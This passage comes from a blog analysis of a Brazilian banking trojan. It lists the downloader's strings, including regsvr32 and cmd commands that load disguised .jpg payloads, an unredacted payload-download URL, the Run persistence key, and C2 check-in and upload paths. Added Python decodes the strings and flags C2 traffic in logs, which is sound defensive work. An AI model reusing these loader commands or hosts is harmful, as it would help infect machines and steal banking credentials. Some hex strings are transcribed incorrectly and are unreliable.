<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004918AC &lt;AnsiString&gt; '\\AppData\\Roaming\\'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004918C8 &lt;AnsiString&gt; ':\\'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004918D4 &lt;AnsiString&gt; '79BB689F5EDA5CC6BAC0CCC2C1C3C8B3BDBAB1A89185FC7EE0246CA3'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491918 &lt;AnsiString&gt; '88E2403B'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0049192C &lt;AnsiString&gt; '78BB78E517D210'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491944 &lt;AnsiString&gt; '222F262FCD67FE1C2CBB3DBE37BE37C346DB698EADB148DD628CE87DF977FE61E9738BA7A6B03DB632B6274CE469'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004919AC &lt;AnsiString&gt; 'F079'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004919BC &lt;AnsiString&gt; ':\\Windows\\System32\\REGSVR32.EXE \"'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004919E0 &lt;PAnsiChar&gt; '2.jpg\"'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004919F0 &lt;AnsiString&gt; '57D7'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004919F8 &lt;PAnsiChar&gt; '6.jpg\"'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491A08 &lt;AnsiString&gt; 'C5A0'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491A10 &lt;PAnsiChar&gt; '5.jpg\"'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491A20 &lt;AnsiString&gt; '5.jpg'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491A30 &lt;AnsiString&gt; '5.txt'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491A40 &lt;AnsiString&gt; ':\\Windows\\System32\\cmd.exe /k regsvr32.exe \"'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491A78 &lt;AnsiString&gt; '\"'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491A84 &lt;AnsiString&gt; '2.jpg'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491A94 &lt;AnsiString&gt; '2.txt'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491AA4 &lt;AnsiString&gt; '6.jpg'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00491AB4 &lt;AnsiString&gt; '6.txt'</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Encoded strings:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E473BA5D9C48FB27D679AD3790C3DA67995994B66D934F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">79BB689F5EDA5CC6BAC0CCC2C1C3C8B3BDBAB1A89185FC7EE0246CA3</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">88E2403B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">78BB78E517D210</span></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">222F262FCD67FE1C2CBB3DBE37BE37C346DB698EADB148DD628CE87DF977FE61E9738BA7A6B03DB632B6274CE469</span></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">They decode to:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
Documents and Settings</div>
<div class="separator" style="clear: both;">
http://198.23.250.211/2107/</div>
<div class="separator" style="clear: both;">
058</div>
<div class="separator" style="clear: both;">
id.sys</div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
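<span style="font-family: Arial, Helvetica, sans-serif;">The five pairs above are enough to recover the key and reimplement the decoder, so the rest of the binary's strings can be read without running it. The script below is an added example, not the post's or the malware's code. It implements the string scheme seen in Delphi-based Brazilian bankers (each ciphertext byte is XORed with a repeating ASCII key byte and then "subtracted" from the previous ciphertext byte, the first byte serving only as a seed); that scheme, the recover_key inversion and the key it produces are my inference from the pairs listed here, not something the post states. Caveat: the recovered key is only as long as the longest known plaintext (45 characters), so its true period is unknown and strings longer than that may decode incorrectly past character 45. With it, the three short strings F079, 57D7 and C5A0 in the listing above decode to 2, 6 and 5 (the digits prefixed to the .jpg/.txt names), and the 2.txt strings further down use the same key: 36CB769B87A84EF668F9588D decodes to [bb.com.br] and 0830C97B9042F228C40B4094F76CE2191223CC to bancobrasil.com.br. Several other 2.txt strings as transcribed have an odd number of hex digits and cannot be decoded as printed.</span><br />

```python
# Added example (not from the post or the malware): decoder for the string
# obfuscation used by this Delphi banker, with the key recovered by known
# plaintext from the encoded/decoded pairs the post lists.

# Encoded strings and their decodings, copied from the downloader section.
KNOWN_PAIRS = [
    ("E473BA5D9C48FB27D679AD3790C3DA67995994B66D934F", "Documents and Settings"),
    ("79BB689F5EDA5CC6BAC0CCC2C1C3C8B3BDBAB1A89185FC7EE0246CA3",
     "http://198.23.250.211/2107/"),
    ("88E2403B", "058"),
    ("78BB78E517D210", "id.sys"),
    ("222F262FCD67FE1C2CBB3DBE37BE37C346DB698EADB148DD628CE87DF977FE61E9738BA7A6B03DB632B6274CE469",
     "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN"),
]


def decode(hexstr: str, key: str) -> str:
    """Decode one obfuscated string with a repeating ASCII key.

    Byte 0 of the ciphertext is only a seed.  For every following byte:
    c = byte XOR key[i]; if c <= previous ciphertext byte, add 0xFF
    (0xFF, not 0x100); plaintext char = c - previous ciphertext byte.
    """
    data = bytes.fromhex(hexstr)
    kb = key.encode("latin-1")
    prev = data[0]
    out = bytearray()
    for i, b in enumerate(data[1:]):
        c = b ^ kb[i % len(kb)]
        if c <= prev:
            c += 0xFF
        out.append(c - prev)
        prev = b
    return out.decode("latin-1")


def recover_key(hexstr: str, plaintext: str) -> str:
    """Known-plaintext inversion of decode(): the key bytes one
    (ciphertext, plaintext) pair exposes, one per plaintext character."""
    data = bytes.fromhex(hexstr)
    pt = plaintext.encode("latin-1")
    if len(data) != len(pt) + 1:
        raise ValueError("ciphertext must be one byte longer than plaintext")
    key = bytearray()
    prev = data[0]
    for i, p in enumerate(pt):
        c = p + prev
        if c >= 0xFF:          # the encoder folds a sum of 0xFF to 0 (seen in the RUN-key pair)
            c -= 0xFF
        key.append(c ^ data[i + 1])
        prev = data[i + 1]
    return key.decode("latin-1")


def recover_key_from_pairs(pairs) -> str:
    """Recover the key from the longest pair and require every other pair
    to yield a prefix of it; a mismatch means the scheme or a plaintext is
    wrong, so refuse rather than return a key that only fits one string."""
    longest_enc, longest_pt = max(pairs, key=lambda kv: len(kv[1]))
    key = recover_key(longest_enc, longest_pt)
    for enc, pt in pairs:
        partial = recover_key(enc, pt)
        if not key.startswith(partial):
            raise ValueError(f"pair {pt!r} disagrees with the recovered key")
    return key


def decode_all(hexstrs, pairs=KNOWN_PAIRS) -> dict:
    """Decode further strings from the same binary with the recovered key."""
    key = recover_key_from_pairs(pairs)
    return {h: decode(h, key) for h in hexstrs}


if __name__ == "__main__":
    key = recover_key_from_pairs(KNOWN_PAIRS)
    print("recovered key:", key)
    for enc, pt in KNOWN_PAIRS:
        assert decode(enc, key) == pt, enc
    # Short strings from the listing above and two strings listed for 2.txt.
    for h, s in decode_all(["F079", "57D7", "C5A0", "36CB769B87A84EF668F9588D",
                            "0830C97B9042F228C40B4094F76CE2191223CC"]).items():
        print(h, "->", s)
```

<span style="font-family: Arial, Helvetica, sans-serif;">The consistency check in recover_key_from_pairs is the part worth keeping when reusing this on another sample: a single pair will always "recover" some key, and only agreement across independent pairs tells you the scheme itself is right.</span><br />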
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">This downloader fetches three more payloads from http://198.23.250.211/2107/</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTKaZO0np2pkujLZB4ZUWHbSkkcVF-jY6n6TyklLXeRYtaHAaU190PbAZTrsi1TgNyJvN0Cs_phm_CM2TJKAS2kSd-wEadNb8GtLxWJeviJ9bHxZi3Dc65OjTti0enXzeyIHbkq2ik4k0/s1600/payloads.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTKaZO0np2pkujLZB4ZUWHbSkkcVF-jY6n6TyklLXeRYtaHAaU190PbAZTrsi1TgNyJvN0Cs_phm_CM2TJKAS2kSd-wEadNb8GtLxWJeviJ9bHxZi3Dc65OjTti0enXzeyIHbkq2ik4k0/s1600/payloads.jpg" height="400" width="640" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>2.txt</b> (a .cpl that the downloader loads into memory)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">VirusTotal analysis</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpZW0TSAc8Rw3atw5vAPMZRZ-P4BvRn4ji7lLRYU8ZXfHGQ0u-l1KFpLqIEjgW7xl4T4IA5tCxRHJwefcxSmvF-BnOeqnNjn7XC3OtlTUkI-OV2_BPuXsjLbnJ-ibcBcEvLfTdTAtUeNk/s1600/vt2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpZW0TSAc8Rw3atw5vAPMZRZ-P4BvRn4ji7lLRYU8ZXfHGQ0u-l1KFpLqIEjgW7xl4T4IA5tCxRHJwefcxSmvF-BnOeqnNjn7XC3OtlTUkI-OV2_BPuXsjLbnJ-ibcBcEvLfTdTAtUeNk/s1600/vt2.jpg" height="172" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Encoded strings:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">62F138EF1BCF6880B9EA0444831DA73AC47EE1721CE0634C874</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">36CB769B87A84EF668F9588D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0830C97B9042F228C40B4094F76CE2191223CC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">223FF821D77BCD5E8CC803CF084690B88D84B05E8BBA5491</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BA7EB46A81B176964369BC80F4F8FC4659DA94A89A2</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7EEB4427C173B335886</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">48C1739546E918C3CA1C6024E9A30</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">59EE09281839FE210257F3D63</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">20D86293B86A9A40EC5388CCCF044AFE788D59</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D442FB26D070C641E96AECD972EC6983F66A96B15F96BF7D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">54E70EC169995E8E4E83D0074787C3C7DB540F022CB7EA571953794CD0D4EF76D9C47F3</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">14072DE2063AFE29D0C332AB2FAD2ED568DF543FC473A55E85C4110976E76DE2063EFA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">25026AC97CA94AE61704051D5FF94DFF39F20D66E40933C97FDB63</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB4DF719092ECB74EF61E77D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">3FFB0530DD0F27D47BDD73E723B118CCAF45EE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1C053EE41336000826A6212EAE2FAB443120DC0A27DE0825</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">39F83FF018C8618B4D9CC9005EF06684B3243F525CE71A849FF5989D4044E8AC762</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C3579D51F829C16A9380F660FB5080A75A2D0368E71037CF73ED39449530A826C4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">83EC4526C072B25981</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">53DE57CCB4A788F569ADD373E5AA6E4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F1002CE31A16130F0D75939FF0C739880E74E3251D1C150C3CFD184E8A80D90A5F9D5A85F52CDC74</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">27D512C578F076E857A33EF266A95FA65C2A48BF767DA42F42660FA4C4297CF0E3DD548FE2DD5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">53DE57CCB4A788F569ADD73E5ABAD7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E013DF17C946231F1D65A9EF1C63A890979F948E28D84FB0CCDC9CE3C4D4492C5649C5C8DF12AAB2C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7BB976A954CCAD918FFB00167A858AF270F67CE656CBB247F4117693F21AB022DF0F3C2CD677DE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2B0667DC45343F201B61BBD4385E</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F40723D40B0760C2BEC4C8CE3D42493330363D252140D7484B5D10452B822B228D4033E2AD071D8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F938F42AD44D2A1408729EF41B64AB9592949B87F66AD16497F35D868CC114B258F26D9B4EF6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">011FD679A04CE71BC3205114A8DC6DF7A8AA9472FB22CE0A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">B05E9B5389B049FD33CAB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A0A6B257F527CCA314B8397C00344789A55291A35188BC51</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">222DF813DC17785</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C04CE70E3CE000A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">52F461</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">73958EBD6w0E61EDF0C35B9931A722B2689AA1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0D2CC8B56e7A240</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2BCE6BDA003BF8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">29CB18CF0E0A6FD348B2DE355BA4EB54D352D9403F3229DB1D79ED6AA03AAA20DC1BC6B2699933</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">63915E914CC44A59987F3187E828D82FA78FE74EE6EE35BED2B6FA8E5276EF86C9E5980A99D469738</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">985B974FF16ECBB7A5ED1278848B80F87EF87EE454CDB447F2174F8D85DE75EA11CF73E712329B</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">They decode as (target browser window titles, C2 URLs and profile paths):</span></b></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Internet Explorer_Server</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[bb.com.br]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bancobrasil.com.br</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Caixa Econômica Federal</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internetbankingcaixa</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">30 horas</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Sicredi Total</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[bb.com.br]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bancobrasil.com.br</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Caixa Econômica Federal</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internetbankingcaixamozillafirefox</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Internet Banking - Mozilla Firefox</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">30 horas - Mozilla Firefox</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[bb.com.br]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bancobrasil.com.br</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Caixa Econômica Federal</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">internetbankingcaixagooglechrome</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Internet Banking - Google Chrome</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">30 horas</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1xx.xx.xx.xxx6 (x redacted for safety)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/av/ad/acesso.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/ct/my/manda.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/av/058/acesso.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/ct/058/manda.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/av/af/acesso.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/ct/va/manda.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Documents and Settings</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Settings\</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\Dados de aplicativos\</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Users\</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Users\</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\D</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">\AppData\Roaming\</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">id.sys</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">id.sys</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xx.xx.xxx6/av/ad/acesso.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.xxx.xx1.xx/av/058/acesso.php</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://1xx.9xx.1xx.1xx/av/af/acesso.php</span></div>
</div>
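<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The decoded URLs all share one tree: <b>/av/&lt;campaign&gt;/acesso.php</b> and <b>/ct/&lt;campaign&gt;/manda.php</b>, with only the middle segment (ad, 058, af, my, va) and the host changing. That shape is a better detection handle than the redacted addresses. The script below is an added example, not part of the original analysis: it classifies proxy-log requests by that path pattern. The log lines are constructed, the log format is an assumption, and 192.0.2.10 (a documentation address) stands in for the redacted C2 host.</span></div>

```python
"""Flag proxy-log requests that hit the C2 paths decoded from 2.txt.

Added example (not from the original analysis). The log lines are
constructed and 192.0.2.10 (a documentation address) stands in for the
redacted C2 host; only the URI shapes come from the decoded strings.
"""
import re
from urllib.parse import urlsplit

# Decoded paths: /av/<campaign>/acesso.php and /ct/<campaign>/manda.php.
# The middle segment varied across strings (ad, 058, af, my, va), so it is a
# wildcard; the host is left out because the same tree was seen on several
# addresses and the operators can move it at will.
C2_PATH = re.compile(r"^/(?P<tree>av|ct)/[^/]+/(?P<script>acesso|manda)\.php$")

# Pairing observed in the sample: av -> acesso.php (check-in),
# ct -> manda.php (the upload that stored the stolen form data).
ROLE = {("av", "acesso"): "checkin", ("ct", "manda"): "exfil"}

# Constructed proxy log format (assumption): "<ts> <client> <method> <url> <status>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)


def classify_url(url: str):
    """Return 'checkin', 'exfil', 'variant' (same tree, other script) or None."""
    m = C2_PATH.match(urlsplit(url).path)
    if m is None:
        return None
    return ROLE.get((m["tree"], m["script"]), "variant")


def scan(lines):
    """Return (ts, client, role, url) for every log line matching the C2 pattern."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.rstrip("\n"))
        if m is None:
            continue  # unexpected format; a real pipeline would count these
        role = classify_url(m["url"])
        if role is not None:
            hits.append((m["ts"], m["client"], role, m["url"]))
    return hits


# Constructed sample: two infected clients, one benign request, one odd variant.
SAMPLE_LOG = [
    "2014-07-30T10:01:02Z 10.0.0.15 GET http://192.0.2.10/av/058/acesso.php 200",
    "2014-07-30T10:01:09Z 10.0.0.15 POST http://192.0.2.10/ct/058/manda.php 200",
    "2014-07-30T10:02:41Z 10.0.0.22 GET http://www.example.com/index.php 200",
    "2014-07-30T10:03:00Z 10.0.0.31 POST http://192.0.2.10/ct/va/manda.php?x=1 200",
    "2014-07-30T10:03:05Z 10.0.0.31 GET http://192.0.2.10/av/va/manda.php 404",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("%s %s %-8s %s" % hit)
```

<div>
<span style="font-family: Arial, Helvetica, sans-serif;">A 'variant' verdict (known tree, unexpected script name) is kept separate from the two observed roles so that a rule tuned on this sample still surfaces new scripts dropped into the same directory layout.</span></div>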
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Screenshots of the fake forms the threat pops up over the banking sessions.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMaZrlJCvLQYtwfr7ELb2cgKYbTU2TSBnUyn3YfbcMwzCScOwxCF73-3WdLMbNNSJMCQfcymOmfqixuVbWHX0KJSaTNBt3tEjrayfAPhltimgmLOCVyd62Wr2ZXwGYqVuGI8C7FVXZ74w/s1600/Image4.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMaZrlJCvLQYtwfr7ELb2cgKYbTU2TSBnUyn3YfbcMwzCScOwxCF73-3WdLMbNNSJMCQfcymOmfqixuVbWHX0KJSaTNBt3tEjrayfAPhltimgmLOCVyd62Wr2ZXwGYqVuGI8C7FVXZ74w/s1600/Image4.Picture.Data.png" height="184" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxsabAT1GjYMegZFf4_A_fU86NmwiEG4JcXqO-8bI5tRW0X8etEVFyKih3Qu0wQj-6W_IinfkjlFvXM8g8IUf5kAjaJK483Yg1o2MqsDQXr207eZeBjQo28jHkD_Z0ZYxLxodUh3vFzxQ/s1600/Image6.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxsabAT1GjYMegZFf4_A_fU86NmwiEG4JcXqO-8bI5tRW0X8etEVFyKih3Qu0wQj-6W_IinfkjlFvXM8g8IUf5kAjaJK483Yg1o2MqsDQXr207eZeBjQo28jHkD_Z0ZYxLxodUh3vFzxQ/s1600/Image6.Picture.Data.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj81ogzaoK2ti3cvXqRyUX0W6QKTQ1hrRlbLGLfOoBL_J3gq0wYKLj6Kr492D0oKPtS3QZX4J2NKbk9vc7xHvIf52vaOtPbWOv1iwb-6NyX9CpWFQwUwoEiFtRgM6OQDRodVbfGtU4AczM/s1600/Image9.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj81ogzaoK2ti3cvXqRyUX0W6QKTQ1hrRlbLGLfOoBL_J3gq0wYKLj6Kr492D0oKPtS3QZX4J2NKbk9vc7xHvIf52vaOtPbWOv1iwb-6NyX9CpWFQwUwoEiFtRgM6OQDRodVbfGtU4AczM/s1600/Image9.Picture.Data.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
